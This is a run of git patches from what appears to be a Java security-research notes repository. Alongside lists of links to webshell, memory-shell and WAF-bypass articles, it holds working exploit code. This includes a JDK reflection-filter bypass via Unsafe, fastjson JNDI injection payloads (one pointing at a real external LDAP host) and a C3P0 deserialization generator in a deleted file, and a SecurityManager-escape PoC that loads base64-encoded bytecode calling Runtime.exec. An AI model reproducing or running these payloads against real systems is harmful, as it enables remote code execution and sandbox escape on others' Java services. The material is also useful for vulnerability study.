+ 2022/10/06 [HSQLDB 安全测试指南](https://b1ue.cn/archives/458.html)
++ 2022/10/06 [Linux terminal/tty/pty and shell](https://kangxiaoning.github.io/post/2021/05/linux-terminal-tty-pty-and-shell/)
From 949c1f10328121fdd98f47914c38b567b483bc38 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Thu, 6 Oct 2022 19:26:24 +0800
Subject: [PATCH 062/257] Create Readme.md
---
Jdk/Readme.md | 65 +++++++++++++++++++++++++++++++++++++++++++++++++++
1 file changed, 65 insertions(+)
create mode 100644 Jdk/Readme.md
diff --git a/Jdk/Readme.md b/Jdk/Readme.md
new file mode 100644
index 0000000..7366273
--- /dev/null
+++ b/Jdk/Readme.md
@@ -0,0 +1,65 @@
+# JDK
+
+jdk>12不能反射修改下面class的成员。
+
+思路是通过unsafe api去修改Reflection类的成员,赋值为null.
+```java
+
+import sun.misc.Unsafe;
+import java.io.ByteArrayOutputStream;
+import java.io.InputStream;
+import java.lang.reflect.Field;
+import java.util.HashMap;
+
+public class bypass {
+ private static Unsafe getUnsafe() {
+ Unsafe unsafe = null;
+ try {
+ Field field = Unsafe.class.getDeclaredField("theUnsafe");
+ field.setAccessible(true);
+ unsafe = (Unsafe) field.get(null);
+ } catch (Exception e) {
+ throw new AssertionError(e);
+ }
+ return unsafe;
+ }
+ public static byte[] readInputStream(InputStream inputStream) {
+ byte[] temp = new byte[4096];
+ int readOneNum = 0;
+ ByteArrayOutputStream bos = new ByteArrayOutputStream();
+ try {
+ while ((readOneNum = inputStream.read(temp)) != -1) {
+ bos.write(temp, 0, readOneNum);
+ }
+ inputStream.close();
+ }catch (Exception e){
+ }
+ return bos.toByteArray();
+ }
+
+ public void bypassReflectionFilter()throws Exception{
+ Unsafe unsafe = getUnsafe();
+ Class reflectionClass=Class.forName("jdk.internal.reflect.Reflection");
+ byte[] classBuffer = readInputStream(reflectionClass.getResourceAsStream("Reflection.class"));
+ //定义一个类,但不让类加载器知道它。
+ Class reflectionAnonymousClass = unsafe.defineAnonymousClass(reflectionClass,classBuffer,null);
+
+ Field fieldFilterMapField=reflectionAnonymousClass.getDeclaredField("fieldFilterMap");
+ Field methodFilterMapField=reflectionAnonymousClass.getDeclaredField("methodFilterMap");
+
+ if(fieldFilterMapField.getType().isAssignableFrom(HashMap.class)){
+ unsafe.putObject(reflectionClass,unsafe.staticFieldOffset(fieldFilterMapField),new HashMap());
+ }
+ if(methodFilterMapField.getType().isAssignableFrom(HashMap.class)){
+ unsafe.putObject(reflectionClass,unsafe.staticFieldOffset(methodFilterMapField),new HashMap());
+ }
+ }
+ public static void main(String[] args) throws Exception{
+ //绕过Java 反射过滤获取ClassLoader私有字段
+ //ClassLoader.class.getDeclaredField("parent");//在之前反射会报错
+ new bypass().bypassReflectionFilter();
+ ClassLoader.class.getDeclaredField("parent");//在之后反射可以bypass
+ }
+}
+```
+参考:https://github.com/BeichenDream/Kcon2021Code/blob/master/bypassJdk/JdkSecurityBypass.java
From 9cee9aeea248680dbeb95778f4d4a273d11ff974 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Thu, 6 Oct 2022 19:31:45 +0800
Subject: [PATCH 063/257] Update Readme.md
---
Jdk/Readme.md | 9 +++++----
1 file changed, 5 insertions(+), 4 deletions(-)
diff --git a/Jdk/Readme.md b/Jdk/Readme.md
index 7366273..fd5b9b0 100644
--- a/Jdk/Readme.md
+++ b/Jdk/Readme.md
@@ -45,14 +45,15 @@ public class bypass {
Class reflectionAnonymousClass = unsafe.defineAnonymousClass(reflectionClass,classBuffer,null);
Field fieldFilterMapField=reflectionAnonymousClass.getDeclaredField("fieldFilterMap");
- Field methodFilterMapField=reflectionAnonymousClass.getDeclaredField("methodFilterMap");
+ //不需要
+ //Field methodFilterMapField=reflectionAnonymousClass.getDeclaredField("methodFilterMap");
if(fieldFilterMapField.getType().isAssignableFrom(HashMap.class)){
unsafe.putObject(reflectionClass,unsafe.staticFieldOffset(fieldFilterMapField),new HashMap());
}
- if(methodFilterMapField.getType().isAssignableFrom(HashMap.class)){
- unsafe.putObject(reflectionClass,unsafe.staticFieldOffset(methodFilterMapField),new HashMap());
- }
+ //if(methodFilterMapField.getType().isAssignableFrom(HashMap.class)){
+ // unsafe.putObject(reflectionClass,unsafe.staticFieldOffset(methodFilterMapField),new HashMap());
+ //}
}
public static void main(String[] args) throws Exception{
//绕过Java 反射过滤获取ClassLoader私有字段
From 1e6185235b32c44dd0c0db653714953e0f592fc5 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Fri, 7 Oct 2022 18:03:47 +0800
Subject: [PATCH 064/257] Create Readme.md
---
JVM/Readme.md | 5 +++++
1 file changed, 5 insertions(+)
create mode 100644 JVM/Readme.md
diff --git a/JVM/Readme.md b/JVM/Readme.md
new file mode 100644
index 0000000..5c66caf
--- /dev/null
+++ b/JVM/Readme.md
@@ -0,0 +1,5 @@
+# JVM
+
+>自己在学习jvm这本书会记录其中的知识点.
+
++ [通过实例一行一行分析JVM的invokespecial和invokevirtual指令](http://wxweven.win/2017/09/15/JVM-invokespecial%E5%92%8Cinvokevirtual/)
From 762b14c6e3e27b999147cce0112801ea4af2deae Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Fri, 7 Oct 2022 18:04:22 +0800
Subject: [PATCH 065/257] Delete jndi-gadgets.md
---
jndi-gadgets.md | 33 ---------------------------------
1 file changed, 33 deletions(-)
delete mode 100644 jndi-gadgets.md
diff --git a/jndi-gadgets.md b/jndi-gadgets.md
deleted file mode 100644
index bad3ffb..0000000
--- a/jndi-gadgets.md
+++ /dev/null
@@ -1,33 +0,0 @@
-```
-{"@type":"org.apache.shiro.realm.jndi.JndiRealmFactory","jndiNames":["ldap://1.116.136.120:1600/TomcatBypass/TomcatEcho"],"Realms":[""],"a":"a"}
-
-{"object":["com.mchange.v2.c3p0.JndiRefForwardingDataSource",{"jndiName":"rmi://localhost:8088/Exploit", "loginTimeout":0}]}
-
-InputStream in = new FileInputStream("C3P0.ser");
-byte[] data = toByteArray(in);
-in.close();
-String HexString = bytesToHexString(data, data.length);
-String poc = "{\"object\":[\"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\",{\"userOverridesAsString\":\"HexAsciiSerializedMap:"+ HexString + ";\"}]}";
-System.out.println(poc);
-
-public static byte[] toByteArray(InputStream in) throws IOException {
- byte[] classBytes;
- classBytes = new byte[in.available()];
- in.read(classBytes);
- in.close();
- return classBytes;
-}
-
-public static String bytesToHexString(byte[] bArray, int length) {
- StringBuffer sb = new StringBuffer(length);
- for(int i = 0; i < length; ++i) {
- String sTemp = Integer.toHexString(255 & bArray[i]);
- if (sTemp.length() < 2) {
- sb.append(0);
- }
-
- sb.append(sTemp.toUpperCase());
- }
- return sb.toString();
-}
-```
From 4459f1ac2c68be882cab1c9482f093b18b02b532 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Fri, 7 Oct 2022 18:06:09 +0800
Subject: [PATCH 066/257] Update README.md
---
README.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/README.md b/README.md
index 7a7d092..afcf094 100644
--- a/README.md
+++ b/README.md
@@ -22,6 +22,8 @@
+ 2022/01/14 [添加了dubbo漏洞分析](Dubbo) 💛 💙 💜 ❤️ 💚
+ 2022/01/16 [添加CAS漏洞学习](CAS) 💛 💙 💜 ❤️ 💚
+ 2022/03/18 [添加Solr利用exp](Solr) 💛 💙 💜 ❤️ 💚
++ 2022/10/07 [添加jvm的学习笔记](JVM) 💛 💙 💜 ❤️ 💚
++ 2022/10/07 [添加JDK里面的trick](JDK) 💛 💙 💜 ❤️ 💚
From 8673174ad5c42e9c1cb265472803a566adf6fcef Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Sat, 8 Oct 2022 10:17:05 +0800
Subject: [PATCH 067/257] Update Readme.md
---
"java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" "b/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md"
index 41c4596..0bc0205 100644
--- "a/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md"
+++ "b/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md"
@@ -25,3 +25,4 @@ https://www.sec-in.com/author/8 这个师傅太猛了
+ 2021/12/21 [绕过后缀安全检查进行文件上传-2](https://www.sec-in.com/article/1328) **只能说非常np了,servlet单例,属性在调用时会被共享,存在线程安全问题。扩展一下java中volatile有可能存在线程安全问题[参考](https://github.com/Firebasky/Java/blob/main/java%E6%97%A5%E5%B8%B8/Thinking_in_java%E9%AB%98%E7%BA%A7%E4%B9%8Bvolatile.md)** 看看能不能搭建一个环境复现一下。。。。
+ 2022/01/31 [验证是否存在写文件漏洞小技巧](https://mp.weixin.qq.com/s?__biz=MzkyMDIxMjE5MA==&mid=2247483994&idx=1&sn=2d29f31afa27a3709b5dc9e46532230a&chksm=c19705ebf6e08cfdd6dc59937beee4a77110b3cac9958335a6cfdbd020d00f2f24a7033063f2&mpshare=1&scene=23&srcid=0131EzMk9fpayyNZeXFR8nhb&sharer_sharetime=1643561054742&sharer_shareid=33a823b10ae99f33a60db621d83241cb#rd)
+ 2022/02/26 [记一次曲折的weblogic上传webshell](https://chaserw.github.io/2021/11/05/%E8%AE%B0%E4%B8%80%E6%AC%A1%E6%9B%B2%E6%8A%98%E7%9A%84weblogic%E4%B8%8A%E4%BC%A0webshell/)
++ 2022/10/08 [实战 | 一次成功的子域名劫持](https://mp.weixin.qq.com/s/xA6OVbeQrCgeYBWMtkvWVA) **学习**
From 5e0164f00de0a38b9bcca1d1d0aea0259c7fe62c Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Sat, 8 Oct 2022 10:18:03 +0800
Subject: [PATCH 068/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index 3625db3..368e047 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -172,3 +172,4 @@
+ 2022/10/05 [一种新的Tomcat内存马 - Upgrade内存马](https://tttang.com/archive/1709)
+ 2022/10/06 [HSQLDB 安全测试指南](https://b1ue.cn/archives/458.html)
+ 2022/10/06 [Linux terminal/tty/pty and shell](https://kangxiaoning.github.io/post/2021/05/linux-terminal-tty-pty-and-shell/)
++ 2022/10/08 [利用ModSecurity内置实现第一代 rasp](https://mp.weixin.qq.com/s?__biz=Mzg3ODY3MzcwMQ==&mid=2247489448&idx=1&sn=3a64455cb703152d9f69b3fa3657f7f7&chksm=cf117de2f866f4f46b088ca106911db77ef7e16b3408ef5c3f3d893c99432227f38ed0969367&mpshare=1&scene=23&srcid=1008ouxJsQWdvxgKPMzYC9x0&sharer_sharetime=1665193299451&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd)
From 6d147dde23625d4cd2330f05326625ab242f269a Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Sat, 8 Oct 2022 21:30:19 +0800
Subject: [PATCH 069/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index 368e047..d01111e 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -173,3 +173,4 @@
+ 2022/10/06 [HSQLDB 安全测试指南](https://b1ue.cn/archives/458.html)
+ 2022/10/06 [Linux terminal/tty/pty and shell](https://kangxiaoning.github.io/post/2021/05/linux-terminal-tty-pty-and-shell/)
+ 2022/10/08 [利用ModSecurity内置实现第一代 rasp](https://mp.weixin.qq.com/s?__biz=Mzg3ODY3MzcwMQ==&mid=2247489448&idx=1&sn=3a64455cb703152d9f69b3fa3657f7f7&chksm=cf117de2f866f4f46b088ca106911db77ef7e16b3408ef5c3f3d893c99432227f38ed0969367&mpshare=1&scene=23&srcid=1008ouxJsQWdvxgKPMzYC9x0&sharer_sharetime=1665193299451&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd)
++ 2022/10/08 [WAF bypasses via 0days](https://terjanq.medium.com/waf-bypasses-via-0days-d4ef1f212ec)
From 85590784b125ec6df20b93a445346f87a5bd2f78 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Mon, 10 Oct 2022 17:01:17 +0800
Subject: [PATCH 070/257] Create BypassOfCreateClassLoader.java
---
BypassSM/BypassOfCreateClassLoader.java | 54 +++++++++++++++++++++++++
1 file changed, 54 insertions(+)
create mode 100644 BypassSM/BypassOfCreateClassLoader.java
diff --git a/BypassSM/BypassOfCreateClassLoader.java b/BypassSM/BypassOfCreateClassLoader.java
new file mode 100644
index 0000000..21ec80e
--- /dev/null
+++ b/BypassSM/BypassOfCreateClassLoader.java
@@ -0,0 +1,54 @@
+package com.evil;
+
+import java.security.*;
+import java.security.cert.Certificate;
+
+public class MyPoc {
+ //-Djava.security.manager -Djava.security.policy==bypass-by-createclassloader.policy
+ static {
+ try {
+ Exp();
+ } catch (Exception e) {
+ e.printStackTrace();
+ }
+ }
+
+ public static void Exp() throws Exception{
+ BypassClassLoader0 bypassClassLoader = new BypassClassLoader0();
+ Class aClass0 = bypassClassLoader.get(base64Decode("yv66vgAAADQAHwoABgAWBwAXCgACABYKABgAGQcAGgcAGwEADElubmVyQ2xhc3NlcwEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQALTGV2aWxDbGFzczsBAARtYWluAQAWKFtMamF2YS9sYW5nL1N0cmluZzspVgEABGFyZ3MBABNbTGphdmEvbGFuZy9TdHJpbmc7AQAIPGNsaW5pdD4BAApTb3VyY2VGaWxlAQAOZXZpbENsYXNzLmphdmEMAAgACQEAC2V2aWxDbGFzcyQxBwAcDAAdAB4BAAlldmlsQ2xhc3MBABBqYXZhL2xhbmcvT2JqZWN0AQAeamF2YS9zZWN1cml0eS9BY2Nlc3NDb250cm9sbGVyAQAMZG9Qcml2aWxlZ2VkAQA0KExqYXZhL3NlY3VyaXR5L1ByaXZpbGVnZWRBY3Rpb247KUxqYXZhL2xhbmcvT2JqZWN0OwAhAAUABgAAAAAAAwABAAgACQABAAoAAAAvAAEAAQAAAAUqtwABsQAAAAIACwAAAAYAAQAAAAQADAAAAAwAAQAAAAUADQAOAAAACQAPABAAAQAKAAAAKwAAAAEAAAABsQAAAAIACwAAAAYAAQAAABUADAAAAAwAAQAAAAEAEQASAAAACAATAAkAAQAKAAAAKAACAAAAAAAMuwACWbcAA7gABFexAAAAAQALAAAACgACAAAABgALABEAAgAUAAAAAgAVAAcAAAAKAAEAAgAAAAAACA=="), "evilClass");
+ bypassClassLoader.get(base64Decode("yv66vgAAADQALQoACAAcCgAdAB4IAB8KAB0AIAcAIQoABQAiBwAjBwAkBwAlAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAAxJbm5lckNsYXNzZXMBAA1MZXZpbENsYXNzJDE7AQADcnVuAQAUKClMamF2YS9sYW5nL09iamVjdDsBAAR2YXIyAQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQANU3RhY2tNYXBUYWJsZQcAIQEAClNvdXJjZUZpbGUBAA5ldmlsQ2xhc3MuamF2YQEAD0VuY2xvc2luZ01ldGhvZAcAJgwACgALBwAnDAAoACkBAARjYWxjDAAqACsBABNqYXZhL2xhbmcvRXhjZXB0aW9uDAAsAAsBAAtldmlsQ2xhc3MkMQEAEGphdmEvbGFuZy9PYmplY3QBAB5qYXZhL3NlY3VyaXR5L1ByaXZpbGVnZWRBY3Rpb24BAAlldmlsQ2xhc3MBABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7AQAPcHJpbnRTdGFja1RyYWNlADAABwAIAAEACQAAAAIAAAAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0AAAAGAAEAAAAGAA4AAAAMAAEAAAAFAA8AEQAAAAEAEgATAAEADAAAAGoAAgACAAAAErgAAhIDtgAEVwGwTCu2AAYBsAABAAAACgALAAUAAwANAAAAFgAFAAAACQAJAAoACwALAAwADAAQAA0ADgAAABYAAgAMAAYAFAAVAAEAAAASAA8AEQAAABYAAAAGAAFLBwAXAAMAGAAAAAIAGQAaAAAABAAbAAAAEAAAAAoAAQAHAAAAAAAI"), "evilClass$1");
+ Class.forName(aClass0.getName(), true, bypassClassLoader);
+ }
+
+ public static byte[] base64Decode(String bs) throws Exception {
+ Class base64;
+ byte[] value = null;
+ try {
+ base64 = Class.forName("java.util.Base64");
+ Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);
+ value = (byte[]) decoder.getClass().getMethod("decode", new Class[]{String.class}).invoke(decoder, new Object[]{bs});
+ } catch (Exception e) {
+ try {
+ base64 = Class.forName("sun.misc.BASE64Decoder");
+ Object decoder = base64.newInstance();
+ value = (byte[]) decoder.getClass().getMethod("decodeBuffer", new Class[]{String.class}).invoke(decoder, new Object[]{bs});
+ } catch (Exception e2) {
+ }
+ }
+ return value;
+ }
+
+ public static class BypassClassLoader0 extends ClassLoader{
+ public Class get(byte[] b,String name) {
+ PermissionCollection pc = new Permissions();
+ pc.add(new AllPermission());
+ //设置ProtectionDomain
+ ProtectionDomain pd = new ProtectionDomain(new CodeSource(null, (Certificate[]) null), pc, this, null);
+ return super.defineClass(name, b, 0, b.length,pd);
+ }
+ }
+
+ public static void main(String[] args) {
+
+ }
+}
From 6217236b2173ab841592262c9afb274e370edcea Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Tue, 11 Oct 2022 23:44:18 +0800
Subject: [PATCH 071/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index d01111e..47eaea1 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -174,3 +174,4 @@
+ 2022/10/06 [Linux terminal/tty/pty and shell](https://kangxiaoning.github.io/post/2021/05/linux-terminal-tty-pty-and-shell/)
+ 2022/10/08 [利用ModSecurity内置实现第一代 rasp](https://mp.weixin.qq.com/s?__biz=Mzg3ODY3MzcwMQ==&mid=2247489448&idx=1&sn=3a64455cb703152d9f69b3fa3657f7f7&chksm=cf117de2f866f4f46b088ca106911db77ef7e16b3408ef5c3f3d893c99432227f38ed0969367&mpshare=1&scene=23&srcid=1008ouxJsQWdvxgKPMzYC9x0&sharer_sharetime=1665193299451&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd)
+ 2022/10/08 [WAF bypasses via 0days](https://terjanq.medium.com/waf-bypasses-via-0days-d4ef1f212ec)
++ 2022/10/11 [记一次 Tomcat 部署 WAR 包拦截绕过的深究](https://www.ch1ng.com/blog/264.html) **文件上传也可以绕过**
From 496002a3fd1a6b269809251196271e9a5f6aac66 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Wed, 12 Oct 2022 14:32:12 +0800
Subject: [PATCH 072/257] Create Readme.md
---
Jdk/dnsrebinding/Readme.md | 13 +++++++++++++
1 file changed, 13 insertions(+)
create mode 100644 Jdk/dnsrebinding/Readme.md
diff --git a/Jdk/dnsrebinding/Readme.md b/Jdk/dnsrebinding/Readme.md
new file mode 100644
index 0000000..cf62f1a
--- /dev/null
+++ b/Jdk/dnsrebinding/Readme.md
@@ -0,0 +1,13 @@
+# java rebinding
+
+http://www.loongten.com/2020/02/26/dns-rebinding-bypass
+
+http://www.lpnote.com/2018/11/23/java-dns-cache/
+
+https://www.xmanblog.net/java-dns-rebinding-ssrf/
+
+https://paper.seebug.org/390/
+
+https://powerdns.org/hello-dns/
+
+http://www.ruanyifeng.com/blog/2016/06/dns.html
From 795475bb6737abce9f7fed6aca3a9e8df3f135d8 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Fri, 14 Oct 2022 20:46:01 +0800
Subject: [PATCH 073/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index 47eaea1..98eec1b 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -175,3 +175,4 @@
+ 2022/10/08 [利用ModSecurity内置实现第一代 rasp](https://mp.weixin.qq.com/s?__biz=Mzg3ODY3MzcwMQ==&mid=2247489448&idx=1&sn=3a64455cb703152d9f69b3fa3657f7f7&chksm=cf117de2f866f4f46b088ca106911db77ef7e16b3408ef5c3f3d893c99432227f38ed0969367&mpshare=1&scene=23&srcid=1008ouxJsQWdvxgKPMzYC9x0&sharer_sharetime=1665193299451&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd)
+ 2022/10/08 [WAF bypasses via 0days](https://terjanq.medium.com/waf-bypasses-via-0days-d4ef1f212ec)
+ 2022/10/11 [记一次 Tomcat 部署 WAR 包拦截绕过的深究](https://www.ch1ng.com/blog/264.html) **文件上传也可以绕过**
++ 2022/10/14 [【技术原创】Java利用技巧——AntSword-JSP-Template的优化](https://mp.weixin.qq.com/s?__biz=MzI0MDY1MDU4MQ==&mid=2247552091&idx=1&sn=061377d83ca103c5d0ddbe36e914d2e8&chksm=e915dc61de6255770aee47e7bdf1d50bc6814a99def28b64ed63164faa547c08e28f7c1864c9&mpshare=1&scene=23&srcid=10145tBlCMybIMqBL3KthNAx&sharer_sharetime=1665748971719&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **可能之后有用**
From b6f2ec66e83eb4a1d835b789d55e48c6feb4948b Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Sat, 15 Oct 2022 22:01:26 +0800
Subject: [PATCH 074/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index 98eec1b..9267955 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -176,3 +176,4 @@
+ 2022/10/08 [WAF bypasses via 0days](https://terjanq.medium.com/waf-bypasses-via-0days-d4ef1f212ec)
+ 2022/10/11 [记一次 Tomcat 部署 WAR 包拦截绕过的深究](https://www.ch1ng.com/blog/264.html) **文件上传也可以绕过**
+ 2022/10/14 [【技术原创】Java利用技巧——AntSword-JSP-Template的优化](https://mp.weixin.qq.com/s?__biz=MzI0MDY1MDU4MQ==&mid=2247552091&idx=1&sn=061377d83ca103c5d0ddbe36e914d2e8&chksm=e915dc61de6255770aee47e7bdf1d50bc6814a99def28b64ed63164faa547c08e28f7c1864c9&mpshare=1&scene=23&srcid=10145tBlCMybIMqBL3KthNAx&sharer_sharetime=1665748971719&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **可能之后有用**
++ 2022/10/15 [bcel环境下打入springboot内存马](https://mp.weixin.qq.com/s?__biz=MzU5MTExMjYwMA==&mid=2247485492&idx=1&sn=82fd393c7fc33417bff5d8cfa81b1451&chksm=fe32b8c3c94531d520d3fe4b0349b982fab83da2f6273799b68aa48f7bbb16700a642034c15e&mpshare=1&scene=23&srcid=1014Db7SCSD03rrslhpasxqf&sharer_sharetime=1665743334925&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **解决方法太麻烦,可以直接写一个loader里面加载代码。就不需要通过bcel加载了。(因为使用bcel加载的时候会存在class not find,因为加载器是bcel.)**
From cb24f175dd69d6140d74e1e42ae29b2850ef0bab Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Sat, 15 Oct 2022 23:27:10 +0800
Subject: [PATCH 075/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index 9267955..cb7da58 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -177,3 +177,4 @@
+ 2022/10/11 [记一次 Tomcat 部署 WAR 包拦截绕过的深究](https://www.ch1ng.com/blog/264.html) **文件上传也可以绕过**
+ 2022/10/14 [【技术原创】Java利用技巧——AntSword-JSP-Template的优化](https://mp.weixin.qq.com/s?__biz=MzI0MDY1MDU4MQ==&mid=2247552091&idx=1&sn=061377d83ca103c5d0ddbe36e914d2e8&chksm=e915dc61de6255770aee47e7bdf1d50bc6814a99def28b64ed63164faa547c08e28f7c1864c9&mpshare=1&scene=23&srcid=10145tBlCMybIMqBL3KthNAx&sharer_sharetime=1665748971719&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **可能之后有用**
+ 2022/10/15 [bcel环境下打入springboot内存马](https://mp.weixin.qq.com/s?__biz=MzU5MTExMjYwMA==&mid=2247485492&idx=1&sn=82fd393c7fc33417bff5d8cfa81b1451&chksm=fe32b8c3c94531d520d3fe4b0349b982fab83da2f6273799b68aa48f7bbb16700a642034c15e&mpshare=1&scene=23&srcid=1014Db7SCSD03rrslhpasxqf&sharer_sharetime=1665743334925&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **解决方法太麻烦,可以直接写一个loader里面加载代码。就不需要通过bcel加载了。(因为使用bcel加载的时候会存在class not find,因为加载器是bcel.)**
++ 2022/10/15 [Padding Oracle原理深度解析&CBC字节翻转攻击原理解析](https://mp.weixin.qq.com/s/OtGw-rALwpBkERfvqdZ4kQ?utm_source=qq&utm_medium=social&utm_oi=1165421494795706368)
From c22255f37bd0f93746997bc51c0308ea2a2aa4f4 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Sun, 16 Oct 2022 12:43:47 +0800
Subject: [PATCH 076/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index cb7da58..81a54e9 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -178,3 +178,4 @@
+ 2022/10/14 [【技术原创】Java利用技巧——AntSword-JSP-Template的优化](https://mp.weixin.qq.com/s?__biz=MzI0MDY1MDU4MQ==&mid=2247552091&idx=1&sn=061377d83ca103c5d0ddbe36e914d2e8&chksm=e915dc61de6255770aee47e7bdf1d50bc6814a99def28b64ed63164faa547c08e28f7c1864c9&mpshare=1&scene=23&srcid=10145tBlCMybIMqBL3KthNAx&sharer_sharetime=1665748971719&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **可能之后有用**
+ 2022/10/15 [bcel环境下打入springboot内存马](https://mp.weixin.qq.com/s?__biz=MzU5MTExMjYwMA==&mid=2247485492&idx=1&sn=82fd393c7fc33417bff5d8cfa81b1451&chksm=fe32b8c3c94531d520d3fe4b0349b982fab83da2f6273799b68aa48f7bbb16700a642034c15e&mpshare=1&scene=23&srcid=1014Db7SCSD03rrslhpasxqf&sharer_sharetime=1665743334925&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **解决方法太麻烦,可以直接写一个loader里面加载代码。就不需要通过bcel加载了。(因为使用bcel加载的时候会存在class not find,因为加载器是bcel.)**
+ 2022/10/15 [Padding Oracle原理深度解析&CBC字节翻转攻击原理解析](https://mp.weixin.qq.com/s/OtGw-rALwpBkERfvqdZ4kQ?utm_source=qq&utm_medium=social&utm_oi=1165421494795706368)
++ 2022/10/16 [Shiro Padding Oracle攻击分析](https://www.cnblogs.com/wh4am1/p/12761959.html) **重新学习**
From 5b3bed1865a4acf8e139ed2934bdd08040b3f441 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Sun, 16 Oct 2022 23:10:53 +0800
Subject: [PATCH 077/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index 81a54e9..39d0e80 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -179,3 +179,4 @@
